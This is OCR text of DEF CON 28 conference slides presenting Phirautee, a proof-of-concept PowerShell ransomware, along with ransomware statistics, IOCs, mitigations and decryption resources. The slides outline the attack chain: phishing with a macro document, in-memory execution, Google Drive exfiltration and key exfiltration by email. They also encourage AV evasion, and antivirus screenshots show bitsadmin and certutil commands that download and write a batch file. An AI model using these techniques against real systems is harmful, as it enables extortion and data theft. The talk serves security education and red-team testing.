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Phirautee 
- DEF CON 28 Presentation - 
https://github.com/Viralmaniar/Phirautee 


LEGAL DISCLAIMER 


*. Performing any hack attempts or tests without written permission from the owner of the computer system 
is illegal. 


e If you recently suffered a breach or targeted by a ransomware and found techniques or tools illustrated in 
this presentation similar, this neither incriminates my involvement in any way, nor implies any connection 
between myself and the attackers. 


e The tools and techniques remain universal and penetration testers and security consultants often uses 
them during engagements. 


*. Phirautee project must not be used for illegal purposes. It is strictly for educational and research purposes 
and for people to experiment with. 
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WHOAMI 


e Over 8 years of experience in the field of information security and management 


e Passionate about offensive and defensive security 


e Runs a boutique consultancy firm — Preemptive Cybersecurity Pty Ltd 


e Technical Manager at RisklO for the APAC region © E MEN LASS Tay NZI MUI 


*. In my free time I develop security tools 
https://www.linkedin.com/in/viral 


maniar/ 


e Presented at BlackHat USA, RootCon and (ISC)2 local chapter 


e Outside of Infosec land — I like photography 
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AGENDA 


History of threat actors 

Recent news on ransomware attacks 

Introduction to ransomware 

Statistics of the ransomware attacks 

Understand the Ransomware as a Service (RaaS) chain 
Introduction to Phirautee tool and setup guide 

Demo - Phirautee 

Mitigation strategies 


Final words on some of the community projects 
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STEALING — OLDEST CRIME 
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RECENT RANSOMWARE ATTACKS EE 
Healthcare IT News 


ID MUST READ: What is a Chief Technology Officer? Everything you need to know about the CTO 


Ransomware: Attacks that start with phishing 
emails are suddenly back in fashion again 


Global Edition Privacy & Security 


UCSF pays $1.14 million to “ i. I. o 
= mail was once the main method for delivering ransomware. Now familiar and new forms of ransomware are using it 
decrypt files after ransomware again. 


attack 
= & 
| | =n The Register 
The medical school was hit by an opportunistic malware attack PG, A 


on June 1, and the encrypted data was "important to some of 
È . x . a A DATA CENTRE SOFTWARE SECURITY DEVOPS BUSINESS PERSONAL TECH SCIENCE EMERGENT TECH BOOTNOTES VENDOR VOICE A Q 
the academic work we pursue as a university serving the public 


good," officials said. 


{* SECURITY *} 
By Mike Miliard | June 29, 2020 | 04:02 PM Lacan Canadian insurer paid for ransomware decryptor. Now it's hunting 
the scum down 


A curious tale of Bitcoin exchanges and the High Court 


E nn ne se ma os amas 


HOBBLED — 


Garmin's four-day service meltdown was 
caused by ransomware 


Provider of GPS services for navigation and wearable devices is returning to normal. 
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INTRODUCTION TO RANSOMWARE 


Ransomware is a class of malware that uses cryptography algorithms to encrypt files on the infected 
machine and later extorts the victim to pay via crypto currency, gift cards, bank transfers or mobile 
payments. 


Upon payment user may or may not receive a decryption key to retrieve encrypted files. 
Most ransomware attacks are financially motivated. 


Most common way of asking ransom is through cryptocurrency such as Bitcoin (BTC), Ethereum (ETH) or 
Monero (XMR). 


Recent trends shows ransomware authors are moving to privacy coins such as Monero (XMR). New 
version of Sodinokibi aka REvil have decided to abandon Bitcoin and switched to Monero Cryptocurrency. 


HOW DO I KNOW IF I AM INFECTED€ I 


e Ransomware is usually considered as one of the nosiest attacks. Infection signs are shown to users through 
various channels such as desktop wallpaper, notes and through infection notice. 


* An alarming window is opened and you cannot close it. 


e Below are some examples of ransomware screens: 


Buy Decryptor 


To buy the decryptor, you must pay the cost of: © ©“ Bitcoin ($ 993.88) 
t 
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WANNACRY HACKED EVERYTHIN 


Ooops, your files have been encrypted! 


O 


What Happened to My Computer? 
Your important files are encrypted. 
Many of your documents, photos, videos, databases and other files are no longer 
accessible because they have been encrypted. Maybe you are busy looking for a way to 
recover your files, but do not waste your time. Nobody can recover your files without 
our decryption service. 
Payment w ised 
ye a TT Can I Recover My Files? 
m Sure. We guarantee that you can recover all your files safely and easily. But you have 
not so enough time. 
Time Left You can decrypt some of your files for free. Try now by clicking <Decrypt>. 
=" a But if you want to decrypt all your files, you need to pay. 
You only have 3 days to submit the payment. After that the price will be doubled. 
you don't pay in 7 days, you won't be able to recover your files forever. 
We will have free events for users who are so poor that they couldn't pay in 6 months 


5/16/2017 00:47:55 


Your files will be lost on 
How Do I Pay? 
Payment is accepted in Bitcoin only. For more information, click <About bitcoin> 
Please check the current price of Bitcoin and buy some bitcoins. For more information, 
click <How to buy bitcoins>. 

d send the correct amount to the address specified in this window. 
After your payment, click <Check Payment>. Best time to check: 9:00am - 11:00am 


Sea ee i 


g E Send $300 worth of bitcoin to this address 
bitcoin 
PRE [12:9YDPgwueZ9NyMgw519p7AASisjr6 SM 


sp EE I E.R — 


5/20/2017 00:47:55 m 


Time Left 
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ATTACK STATISTICS AND INFECTION METHODS 


© Ransomware attacks: 2015- 2020 (Q1) 


“Most of the ransomware attacks are 
opportunistic" 


E Remote Services 
51% 


Phishing Emails and Social Engineering 


—e— Ransom Attacks 


Software vulns 


Torrent, Cracked Software or USB attacks 


= 3% 


12/31/2015 12/31/2016 12/31/2017 12/31/2018 12/31/2019 07/30/2020 R 
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RANSOMWARE AS A SERVICE 


Malicious attackers or criminals hacks into a 
server or hosts. Make them part of a huge 
botnet. Puts this machine up for a sale in the 

market for others to play around. 


3S Denial of Service GJ app Manager OÈ Settings 


Ransomware authors buys access to 
these compromised hosts and installs 
backdoors on the system for persistence 
mechanism. 


Malicious attackers then use it for a malware 
distribution, DDoS attacks, phishing campaigns, 
social engineering, fraud, Crypto mining or for a 

ransom. 
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XDEDIC 


e xDedic is a great example of one such marketplace. The service was offering 70k hosts across 173 


countries. 


e Portal had 416 unique sellers at the time of takedown. 3300 esse.. 


La Vega, Concepcion De La... | ZIP: 10702 
@ other 
Checked Uptime 
15.04.2016 4 Days 


7.00$ 


| _ Login to your accoun | — os = — 


Not Found. 
Usemame 
Internet Shops 
Password 
1. © target.com 
Select language Other Files 
Not Found. 


Windows Server 2012 R2 | x64| ES Admin Privilege: Yes 

Intel(R) Xeon(R) CPU E3-1225 v3 @ 3.... Direct IP: No 

Ram: 3.91 GB | CPU Cores: 4 Antivirus: Unknown 
Browsers: 
Opened Ports: No 
Virtual: No 


Check IP-Score (020$) 


Poker Systems 
Not Found. 
Dating Sites 
Not Found. 
Other Sites 
1. RA yahoo.com 


Cancel Check for Blacklist | soy | 


https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07191218/xDedic_marketplace_ENG.pdf 
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LOGS/RDP/SSH/PP/CC/SMB MARKETPLACE 


e There are number of market places out there to buy access to compromised hosts 


e Selling price for access to government networks, corporations or universities is Ta 
vy A, 


as low as low 6$ per host. 


= 
(@): 


NA 
ns 
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Q3 2019 — O4 2019 - Q1 2020 


327931 


1339878 
15761 


71063 


779856 
12089 


157445 
3717027 
31865 


500000 


1000000 


1500000 


Sodinokibi 
E Ryuk 
E Phobos 


The average ransom amount paid by a ransomware 
victim to their attacker - in exchange for the 
promise of a decryption tool - increased throughout 
last year. But from the third to fourth quarter of 
2019, ransom payment amounts skyrocketed, from 
$41,198 to $84,116. The median Q4 payment was 
$41,179. 


"The doubling of the average reflects the diversity of 
the threat actors that are actively attacking 
companies," — Coveware Report. 


Attackers using Ryuk and Sodinokibi - aka REvil - 
are increasingly focusing their attacks on large 
companies where they can attempt to extort the 
organization for a seven-figure payout. Note that 
the average Ryuk ransom payment last guarter was 
$780,000 


TARGETED INDUSTRIES 


SN E-Sports Entertainment, Travelex , NHS, 


Honda 


Industries victim of ransomware attacks 


m || & Telecom 
E Energy, oil/gas & utilities 


E Other 


Blackbaud, Argentine Telcom, UCSF, Cognizant 


E Business & professional services 
E Construction & property 
E Retail, distribution and transport 


Toll Group, Deutsche Bahn, Maersk, FedEx 


E Financial services 


E Manufacturing and production 


Public Sector 
Garmin, IN SPORT, Lion, E-Sports 
Entertainment 


In the last year, has your organisation been hit by 
ransomware? Base: 5,000 respondents. 


(THE STATE OF RANSOMWARE 2020 ) - Sophos white paper 


RAA. 
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Latest Ransom: $10 Million 


Over 150 countries got infected 


Sa = 
Linea — M 
- 
a 


it | 
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ATTACK SUMMARY 


S 84,116 


> 1,150% increment in 2019 
> Victim paid avg $20,000 


Organisations sustained attacks: 205, 280 


Market Place 


40 
20 


$6 - $350 NI 


RDP 
<SS 


Gift Card (1396) Buy online gift cards 


Infrastructure (1096) Buy new attack infra 


Ransomware attacks are considered 
as a number one threats to the 
networks in the year of 2020. 


Attacks are increasingly causing 
extended periods of costly 
downtime. 


Multiple methods available for 
cashing out the ransom money. 


= Preemptive Cyber Security 
D KNOW THE UNKNOWN 


INTRODUCING PHIRAUTEE 


Phirautee is a proof of concept ransomware tool written purely using PowerShell. 


It uses Living off the Land (LotL) commands to work against the operating system to encrypt files on the 
machine. 


This tool can be used during internal infrastructure penetration testing or during the red team exercise to 
validate Blue Team/SOC response to ransom attacks. 


It uses public key cryptography to encrypt user content and exfiltrates large files via Google Drive. 
Upon successful attack the ransomware asks for a payment of 0.10 BTC (~1k USD). 
Detection: 

e File extension of the encrypted files are changed to “.phirautee” 


e Desktop wallpaper of the compromised host is changed with Phirautee background 
e Desktop will have Phirautee.txt file 
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PHIRAUTEE ATTACK SETUP 


Phishing server and domain to target an organisation. 


Email server to send malicious documents as an attachment to the targeted user. 


Macro embedded file as an attachment to user which pulls the ransomware from the remote server 
to targeted machine and runs it in a memory. 


Modify couple of parameters in the ransomware file to utilise it for your use case. 


For data exfiltration: 
*. Throwaway Gmail account 
e Gmail API access to a throwaway Google Drive 
e Setup web application on the Google 


Detailed steps for the Google Drive setup can be viewed at: 


https://github.com/Viralmaniar/Phirautee/blob/master/Exfil9e2OSetup.md 
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USE OF CRYPTOGRAPHY IN PHIRAUTEE 


e Uses 2048 bits RSA key to encrypt files on the infected machine. 


e Private key of the certificate gets sent to attacker using a pre-shared secret aka symmetric keys. 


Play progress Play progress 


User A (sender) User B (receiver) User A (sender) User B (receiver) 


= F : || Symmetric key Symmetric key 
me Tio sito a on) - 
TT (Pisintext } (Hell, Word ) 


Asymmetric Key Cryptography Symmetric Key Cryptography 
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SYMMETRIC KEYS & ANON SMTP x 


e Phirautee uses two unique symmetric keys 
* One for the private key of the certificate that's being generated on the user machine. 
* The other one for uploading exfiltrated data on Google Drive 


e The private keys are sent to Pokemail as a zip encrypted files. 


e Phirautee uses Pokemail services to distribute the attack infrastructure by creating a random location 
based email address. 


YokeMail.net 


PokeMail gives you an email-address that is tied to a location! 
You will be given access to a public mailbox for this location, so you can view and reply to all email within 10km radius. 


What's your location? 


Detect My Location 


OR 
Visit Google Maps, then copy and paste the maps URL here: 


Set my location 


n/maps/@40.7690842,-73-9680547,15.75Z 
oordinates 
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THINK TNNOVATIVE 


$source = 


Can you do your entire attack in Memory? $destination = 


Can you be more intrusive and silent at the same time? 
. : $destination 
Can you compromise a host on the UAC settings of ‘Always 
notify"? 


Can you delete logs and clear traces? web .DownloadFile($source, $destination 


Can you perform the entire malicious operation without | OutFile $destination 
user interaction? 


Is your code detected by an AV/EDR vendor? 
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NO 


TRY UNTIL YOU CAN BYPASS i 


O Threat removed or restored Severe O Threat removed or restored Severe O Threat removed or restored Severe 
26/7/2020 12:59 PM 29/6/2020 8:24 PM 29/6/2020 7:59 PM 


Status: Removed or restored Status: Removed or restored 
This threat or app was removed from guarantine or restored to the device. This threat or app was removed from guarantine or restored to the device. 

; N È Threat detected: Trojan:097M/OriAmsi.A!ml 
Threat detected: Trojan:O97M/Mountsi.D!ml Threat detected: TrojanDownloader:O97M/Dornoe.A!ams Alert level: Severe 


Alert level: Severe Alert level: Severe A E 
Date: 26/7/2020 12:59 PM Date: 29/6/2020 8:24 PM Ee SA y ar EU 

Category: Trojan Category: Trojan Downloader i gi J En 7 ni 7 
Details: This program is dangerous and executes commands from an attacker. Details: This program is dangerous and downloads other programs. Deu MUD OE HD O I YDECH EMERSE 


imme Learn more 
Learn more 
1 Affected items: Affected items: 

Affected items: amsi: C\Users\VM\Documents\Work\Preemptive Cyber Security Pty Ltd file: C\Users\VM\Documents\Work\Preemptive Cyber Security Pty Ltd 

amsi: C:\Program Files\Microsoft Office\root\Office16\EXCELEXE \2020\Powershell_List.xism \2020\Defcon & BlackHat USA\Phish Demo\Promotion_List_2020_HR.xlsm 

Actions V Actions vV 
Actions V 
O Threat blocked Severe Threat blocked Severe 
29/6/2020 6:28 PM O 29/6/2020 6:30 PM 

Status: Removed Status: Removed 
Threat detected: Trojan:Win32/BITSAbuse.B Threat detected: Trojan:Win32/Ceprolad.A 
Alert level: Severe Alert level: Severe 
Date: 29/6/2020 6:28 PM Date: 29/6/2020 6:31 PM 
Category: Trojan Category: Trojan 
Details: This program is dangerous and executes commands from an attacker. Details: This program is dangerous and executes commands from an attacker. 
Learn more Learn more 
Affected items: Affected items: 

CmdLine: C:\Windows\system32\bitsadmin.exe /transfer myDownloadJob / CmdLine: C:\Windows\System32\certutil.exe -urlcache -split -f https:// 

download /priority normal https://raw.githubusercontent.com/Viralmaniar/ raw.githubusercontent.com/Viralmaniar/Phirautee/master/test.bat CAtemp 

Phirautee/master/test.bat C:\temp\yo.bat, vbNormalFocus \yo.bat, vbNormalFocus 

Actions v Actions V 
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DEMO TIME! i 


File lume insert Pagelayout Formulas Data Ip Desig Q Tell me what y 
Pa 

à 9 Cut Calibri An va - | SD Phiarutee - DEF CON 2020 Demo 

L Em copy + 
Paste id B. FU = 


© Format Painter 


Clipboard m 


13 

14 

15 

16 

17 

LU Department 

UCI Paneling PES View Encrypted Files with Phiarutee 

20 |Engineering Pat Ragot 

21 |Engineering Constancy Maps - È - - 

Sales Base SUIS EN Send 0.10 BTC to this account: 1HF16jtnSCuRvAThJ7p99GeroAnBkiR4Yb 

23 |Accounting Vince Bodman bodi 

24 |Marketing Maddie Lednor mled Seconds Remaining: T 

25 |Sales Lelia McCroary Imccri 

26 |Sales Philbert Cranch pcrang F = = 

7 Business et Loutitia Byng lbyngd We have encrypted your important files. For now you cannot access these files. 

28 [Business Development Kelvin Bealton kbealt Encrypted files have been modified with an extension "phirautee”. It is possible to 
29 |Research and Development Kim Shout kshoul recover your files but you need to follow our instructions and pay us before the time 
= aeons Ronda Ma = = | runs out. If you do not pay the ransom of 0.10 BTC these files will be leaked online. 
= me TY ee = - mad The faster you contact us at XXXX@XXXXXXXX.XXX with the proof of payment, the 
33 |Training Chrystal er cparkd easier it will be for us to release your files. Your backups were also encrypted and 
34 |Legal Crissy Dries cdries| removed. Please read Phirautee.txt file on the desktop for further information. 

35 Accounting Cheston Blewmen cblewi = 

36 Business Development Karlen Friar kfriarh 

> rene ni rame rana = oe 7 7 —— 
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File paths: 


Ci\temp\cert.cer 
* c\temp\sys.txt 
* ci\temp\backup.zip 
* c\temp\sysl.txt 
* c\temp\steal.zip 
* C.\users\$env: USERNAME \PhirauteeBackground-3,jpg 


MDos: 


77EA9D33D144072F 7B35C10691124D16 
e 4E123FF3A7833FOC8AC6F749D337444D 


Domains used for exfil: 


https://smtp.pokemail.net 
. https;//www.googleapis.com 
. https://accounts.google.com 
e https://raw.githubusercontent.com 


Registry files: 


. HKCUNControl Panel\Desktop 
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IOCS FOR PHIRAUTEE 


Computer\HKEY_CURRENT_USER\Control Panel\Desktop 


v EM Computer 
| | HKEY_CLASSES_ROOT 
v |_| HKEY_CURRENT_USER 
n AppEvents 
B Console 
v | | Control Panel 
| | Accessibility 
D Appearance 
L | Bluetooth 
Li Colors 
BE Cursors 
|| Desktop 
[n Input Method 
BE International 
| | Keyboard 
{| Mouse 
v | | Personalization 
LL Desktop Slideshow 
B PowerCfg 
{| Quick Actions 
B Sound 
{| Environment 
{| EUDC 
(n Keyboard Layout 
il Microsoft 
|... Network 
| | Printers 
v B Software 
|) 7-Zip 
| | Adobe 
B Amazon 
a AppDataLow 
LI AWIND 
E Bose Corporation 
Ll Chromium 
|) Citrix 
0 Classes 
[| Clients 
B Discord 
E ej-technologies 
B Google 
D Grammarly 
m IM Providers 
(| JavaSoft 
int Lavasoft 
| | LogiShrd 
| | Loaitech 


Name 

ab) (Default) 

S's) ActiveWndTrackTimeout 
ab) BlockSendlnputResets 
S's) CaretTimeout 
CaretWidth 
ClickLockTime 

ab) CoolSwitchColumns 
ab] CoolSwitchRows 

ab) CursorBlinkRate 
DelayLocklnterval 

ab) DockMoving 
piScalingVer 

| DragFromMaximize 
ab) DragFullWindows 

ab) DragHeight 

ab] DragWidth 

Wo] FocusBorderHeight 
ie] FocusBorderWidth 

ab) FontSmoothing 
FontSmoothingGamma 


FontSmoothingType 
ForegroundFlashCount 


5 regroundLockTimeout 
fo) LastUpdated 
LeftOverlapChars 
axMonitorDimension 


MenuShowDelay 
ouseWheelRouting 
PaintDesktopVersion 
Pattern 

ab) RightOverlapChars 

ab) ScreenSaveActive 

ab) SnapSizing 

ab) TileWallpaper 
TranscodedimageCache 
TranscodedlmageCount 
UserPreferencesMask 
‘WallPaper 


'WallpaperOriginY 
ab) WallpaperStyle 


ntSmoothingOrientation 


MaxVirtualDesktopDimension 


Type 

REG_SZ 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_SZ 
REG_SZ 
REG_SZ 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_SZ 
REG_SZ 
REG_SZ 
REG_SZ 
REG_BINARY 
REG_DWORD 
REG_BINARY 
REG_SZ 
REG_DWORD 
REG_DWORD 
REG_SZ 


Data 


(value not set) 
0x00000000 (0) 

0 

000001388 (5000) 
0x00000001 (1) 
0x000004b0 (1200) 

7 

3 

530 

0x 00000000 (0) 

1 

0x00001000 (4096) 

1 

1 

4 

4 

0x00000001 (1) 
0x00000001 (1) 

2 

000000000 (0) 
0x00000001 (1) 
0x00000002 (2) 
0x00000007 (7) 
0x00030d40 (200000) 
Oxffffffff (4294967295) 
3 

0x00000f00 (3840) 
0x00001ab8 (6240) 
400 

0x00000002 (2) 
0x00000000 (0) 
0x00000000 (0) 

3 

1 

1 

0 

7a c3 01 00 9e 01 06 00 80 07 00 00 b0 04 00 00 e8 8... 
0x00000002 (2) 

9e 1e 07 80 12 00 00 00 
C:/users/VM/PhirauteeBackground-3.jpg 
0x00000000 (0) 
0x00000000 (0) 

2 
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HOW CRIMINALS CONVERT RANSOM TO CASH? 


2 C h anee 30 Best Crypto Exchanges Without KYC 
“I Verification in 2020! 


GUDEA 


y AgoraDesk 
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RANSOMWARE WRITERS ARE NOT PERFECT 


e Ransomware writers are humans too. They make mistakes. 


* Before paying your ransom make sure your incident response team performs investigation on the malware 
behavior. 


e Some of the ransomware writers drop encryption/decryption keys on the infected machine itself. Make your 
incident response team to analyse the code. 


e Put a proxy in between and modify the amount or address. Sometimes you'll see parameters with value true 
and false. Changing them decrypts your files. 


* Take snapshot of the system before and after the infection if you have samples. Take note of changes on the 
system. 
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RANSOMWARE PROTECTION IN WINDOWS i 


Ransomware Protection is disabled by default 


Controlled folder access helps you protect valuable data 
from malicious apps and threats. 


Controlled folder access feature is included with 
Windows 10 and Windows Server 2019. 


Directories containing sensitive data should be added to 
controlled folder. 


In case the malicious application tries to modify or 
change the documents in the controlled folder a 
notification is generated through Microsoft Defender. 


$*w 


Windows Security 


(n Home 
| © Virus & threat protection 
Q, Account protection 
()) Firewall & network protection 
E App & browser control 
& Device security 
© Device performance & health 
th 


Family options 


D Protection history 


View the latest protection actions and recommendations from Windows 
Security. 


Filtered by: Blocked folder access Filters V 


O Protected folder access blocked Low 
14/7/2020 11:20 PM 


@ Your administrator has blocked this action. 


App or process blocked: powershell.exe 
Protected folder: Ci\temp\ 


Blocked by: Controlled folder access 


You can allow apps to access your protected folders, but you should only allow apps 
that you trust. 


Controlled folder access settings 


Actions vV 
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MITIGATION STRATEGIES 


Network segmentation and detection of lateral movement. Follow principle of least privilege 
access or restrict access to sensitive servers. Make use of MFA on all important portals. 


Disable PowerShell for standard domain users and perform application whitelisting. 
Frequent network wide backups (if possible offline). 

Apply patches and have a vulnerability management program. 

Have a dedicated incident response team and develop a plan for ransomware events. 
Invest in a good IDS/IPS/EDR/AV/CASB product. 


Validate the effectiveness of your defense tools and technologies through pre-approved 
offensive exercise. 


Organise phishing and user education training sessions for your employees. 


Have cyber insurance to help cover costs in case you need to pay the ransom. Furthermore, 
get your insurance policies reviewed to make sure there are no holes. 


Take help from local feds for the decryption keys. 
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B Ransom Note 0 


The file tt 


Browse. 


50 HORE ENID = 
Prevention Advice Decryption Tools R 


Crypto Sheriff Ransomware O&A ecr leport a Crime Partners About the Project 


NEED HELP unlocking your digital life 
without paying your attackers*? 


= = 


Ransomware is malware that locks your computer and mobile devices or encrypts your electronic files. When this 
happens, you can't get to the data unless you pay a ransom. However this is not guaranteed and you should never pay! 


O 


GOOD NEWS 


https://www.nomoreransom.org/ 


ID Ransomware 


@ Sample Encrypted File O 
at displays the ransom and payment informatior A file which has been encrypted, and cannot t 


Browse. 


Z Addresses 


the ransomware gives you for contact (if ther 


https://id-ransomware.malwarehunterteam.com/ 
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encrypted file to identify the ransomware that has encrypted your data 


WWW.NOMORERANSOM.ORG 


DECRYPTED 


— «x — 


REDRUM ZORAB MAPO VCRYPTOR JAVALOCKER DRAGONCYBER 


GOGOOGLE MAGNIBER SIMPLELOCKER KOKOKRYPT OUROBOROS RANSOMWARED 


The battle is over for these ransomware threats. If you have been infected 
with one of these types of ransomware click on the link under its name and 
it will lead you to a decryption tool. 
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ID-RANSOMWARE.MALWAREHUNTERTEAM.COM 


è 000 


Which ransomwares are detected? 


This service currently detects 911 different ransomwares. Here is a complete, dynamic list of what is currently detected: 


$$$ Ransomware, 010001, Okilobypt, 24H Ransomware, 4rw5w, 5ss5c, 777, 7ev3n, 7h9r, 7zipper, 8lock8, AAC, ABCLocker, ACCDFISA v2.0, AdamLocker, Adhubllka, 

AES_KEY_GEN ASSIST, AES-Matrix, AES-NI, AES256-06, Afrodita, AgeLocker, Ako / MedusaReborn, Al-Namrood, Al-Namrood 2.0, Alcatraz, Alfa, Allcry, Alma Locker, Alpha, AMBA, 
Amnesia, Amnesia2, Anatova, AnDROid, AngryDuck, Annabelle 2.1, AnteFrigus, Anubi, Anubis, AnubisCrypt, Apocalypse, Apocalypse (New Variant), ApocalypseVM, ApolloLocker, 
AresCrypt, Argus, Aris Locker, Armage, ArmaLocky, Arsium, ASN1 Encoder, Ataware, Atchbo, Aurora, AutoLocky, AutoWannaCryV2, Avaddon, AVCrypt, Avest, AWT, AxCrypter, aZaZeL, 
B2DR, BadBlock, BadEncript, BadRabbit, Bam!, BananaCrypt, BandarChor, Banks1, BarakaTeam, Bart, Bart v2.0, Basilisgue Locker, BB Ransomware, BeijingCrypt, BetaSup, 
BigBobRoss, BigLock, Billy's Apocalypse, Bisguilla, BitCrypt, BitCrypt 2.0, BitCryptor, BitKangoroo, Bitpaymer / DoppelPaymer, BitPyLock, Bitshifter, BitStak, BRRansomware, Black Claw, 
Black Feather, Black Shades, BlackHeart, BlackKingdom, Blackout, BlackRuby, Blind, Blind 2, Blocatto, BlocKFile12, Blooper, Blue Blackmail, BoooamCrypt, Booyah, BrainCrypt, Brazilian 
Ransomware, Brick, BrickR, BTCamant, BTCWare, BTCWare Aleta, BTCWare Gryphon, BTCWare Master, BTCWare PayDay, Bubble, Bucbi, Bud, Bug, BugWare, BuyUnlockCode, cOhen 
Locker, Cancer, Cassetto, Cerber, Cerber 2.0, Cerber 3.0, Cerber 4.0 / 5.0, CerberTear, Chekyshka, ChernoLocker, Chimera, ChinaJm, ChinaYunLong, ChineseRarypt, CHIP, 
ClicoCrypter, Clop, Clouded, CmdRansomware, CobraLocker, CockBlocker, Coin Locker, CoinVault, Comrade Circle, Conficker, Conti, CoronaVirus, CorruptCrypt, Cossy, Coverton, 
CriptTOr Ransomware, CradleCore, CreamPie, Creeper, Cripton, Cripton7zp, Cry128, Cry36, Cry9, Cryakl, CryCryptor, CryFile, CryLocker, CrypMic, CrypMic, Crypren, Crypto, 
CryptOLOcker, CryptOr, Crypt12, Crypt38, CryptConsole, CryptConsole3, CryptFuck, CryptGhost, Cryptinfinite, CryptoDarkRubix, CryptoDefense, CryptoDevil, CryptoFinancial, 
CryptoFortress, CryptoGod, CryptoHasYou, CryptoHitman, CryptoJacky, CryptoJoker, CryptoLocker3, CryptoLockerEU, CryptoLocky, CryptoLuck, CryptoMix, CryptoMix Revenge, 
CryptoMix Wallet, Crypton, CryptON, CryptoPatronum, CryptoPokemon, CryptorBit, CryptoRoger, CryptoShield, CryptoShocker, CryptoTorLocker, CryptoViki, CryptoWall 2.0, CryptoWall 
3.0, CryptoWall 4.0, CryptoWire, CryptXXX, CryptXXX 2.0, CryptXXX 3.0, CryptXXX 4.0, CryPy, CrySiS, Crystal, CSP Ransomware, CTB-Faker, CTB-Locker, Cuba, CXK-NMSL, DOOmEd, 
Dablio, Damage, DarkoderCryptor, DataKeeper, DavesSmith / Balaclava, Dcrtr, DCry, DCry 2.0, Deadly, DeathHiddenTear, DeathHiddenTear v2, DeathNote, DeathRansom, Decr1pt, 
Decryptlomega, DecYourData, DEDCryptor, Defender, Defray, Defray777, DeriaLock, Desync, Dharma (.cezar Family), Dharma (.dharma Family), Dharma (.onion Family), Dharma 
(.wallet Family), Digisom, DilmaLocker, DirtyDecrypt, Dishwasher, District, DMA Locker, DMA Locker 3.0, DMA Locker 4.0, DMALocker Imposter, DoggeWiper, Domino, Done, 
DoNotChange, Donut, DoubleLocker, DriedSister, DryCry, DualShot, Dviide, DVPN, DXXD, DynA-Crypt, eBayWall, eChOraix / ONAPCrypt, ECLR Ransomware, EdgeLocker, EduCrypt, 


EggLocker, EI Polocker, Enc1, EnCrypt, EncryptedBatch, EncrypTile, EncryptoJJS, Encryptor RaaS, Enigma, Enjey Crypter, EnkripsiPC, EOEO, Erebus, Erica Ransomware, Eris, Estemani, 
Eternal, Everbe, Everbe 2.0, Everbe 3.0, Evil, Executioner, ExecutionerPlus, Exocrypt XTC, Exorcist Ransomware, Exotic, Extortion Scam, Extractor, Fabiansomware, Fadesoft, Fantom, 


FartPiz, FCPRansomware, FCrypt, FCT, FenixLocker, FenixLocker 2.0, Fenrir, FilesLocker, FindZip, FireCrypt, Flatcher3, FLKR, FlowEncrypt, Flyper, FonixCrypter, FreeMe, FrozrLock, 
FRSRansomware, FSOciety, FTCode, FuckSociety, FunFact, FuxSocy Encryptor, Galacti-Crypter, GandCrab, GandCrab v4.0 / v5.0, GandCrab2, GarrantyDecrypt, GC47, Gerber, 
GermanWiper, GetCrypt, GhostCrypt, GhostHammer, Gibberish, Gibon, Globe, Globe (Broken), Globe3, Globelmposter, Globelmposter 2.0, Godra, GOG, GoGoogle, GoGoogle 2.0, 
Golden Axe, GoldenEye, Gomasom, Good, GoRansom, Gorgon, Gotcha, GPAA, GPCode, GPGGwerty, GusCrypter, GX40, HadesLocker, Hakbit, Halloware, HappyDayzz, hc6, hc7, 
HDDCryptor, HDMR, HE-HELP, Heimdall, HellSRansomware, Help50, HelpDCFile, Herbst, Hermes, Hermes 2.0, Hermes 2.1, Hermes837, Heropoint, Hi Buddy!, HiddenTear, HildaCrypt, 
HKCrypt, HollyCrypt, HolyCrypt, HPE iLO Ransomware, HR, Hucky, Hydra, HydraCrypt, IEncrypt, IFN643, ILElection2020, Ims00ry, ImSorry, Incanto, InducVirus, InfiniteTear, InfinityLock, 
InfoDot, InsaneCrypt, iRansom, Iron, Ishtar, Israbye, JabaCrypter, Jack.Pot, Jaff, Jager, JapanLocker, JavaLocker, JeepersCrypt, Jemd, Jigsaw, JNEC.a, JobCrypter, JoeGo Ransomware, 
JosepCrypt, JSWorm, JSWorm 2.0, JSWorm 4.0, JuicyLemon, JungleSec, Kaenlupuf, Kali, Karma, Karmen, Karo, Kasiski, Katyusha, KawaiiLocker, KCW, Kee Ransomware, KeRanger, 
Kerkoporta, KeyBTC, KEYHolder, KillerLocker, KillRabbit, KimcilWare, Kirk, KokoKrypt, Kolobo, Kostya, Kozy.Jozy, Kraken, Kraken Cryptor, KratosCrypt, Krider, Kriptovor, KryptoLocker, 
Kupidon, L33TAF Locker, Ladon, Lalabitch, LambdaLocker, LeChiffre, LightningCrypt, Lilocked, Lime, Litra, LittleFinger, LLTP, LMAOxUS, Lock2017, Lock2Bits, Lock93, LockBit, 
LockBox, LockCrypt, LockCrypt 2.0, Locked-In, LockedByte, LockeR, LockerGoga, LockLock, LockMe, Lockout, LockTaiwan, Locky, LolKek, LongTermMemoryLoss, LonleyCrypt, 
LooCipher, Lortok, Lost_Files, LoveServer, LowLevel04, Lucky, MadBit, MAFIA, MafiaWare, Magic, Magniber, Major, Makop, Maktub Locker, MalwareTech's CTF, MaMoCrypter, Maoloa, 
Mapo, Marduk, Marlboro, MarraCrypt, MarsJoke, Matrix, MauriGo, MaxiCrypt, Maykolin, Maysomware, Maze Ransomware, MCrypt2018, MedusaLocker, MegaCortex, MegaLocker, 
Mespinoza, Meteoritan, Mew767, Mikoyan, MindSystem, Minotaur, MirCop, MireWare, Mischa, MMM, MNS CryptoLocker, Mobef, MongoLock, Montserrat, MoonCrypter, MorrisBatchCrypt, 
MOTD, MoWare, MRCR1, MrDec, Muhstik, Mystic, n1n1n1, NanoLocker, NCrypt, Nefilim, Negozi, Nemty, Nemty 2.x, Nemty Special Edition, Nemucod, Nemucod-7z, Nemucod-AES, 
NETCrypton, Netix, Netwalker (Mailto), NewHT, NextCry, Nhtnwcuf, NM4, NMoreira, NMoreira 2.0, Noblis, Nomikon, NonRansomware, NotAHero, Nozelesn, NSB Ransomware, Nuke, 
NullByte, NxRansomware, Nyton, ODCODC, OhNo!, OmniSphere, OnyxLocker, OOPS, OopsLocker, OpenToYou, OpJerusalem, Ordinypt, Ouroboros v6, OutCrypt, OzozaLocker, 
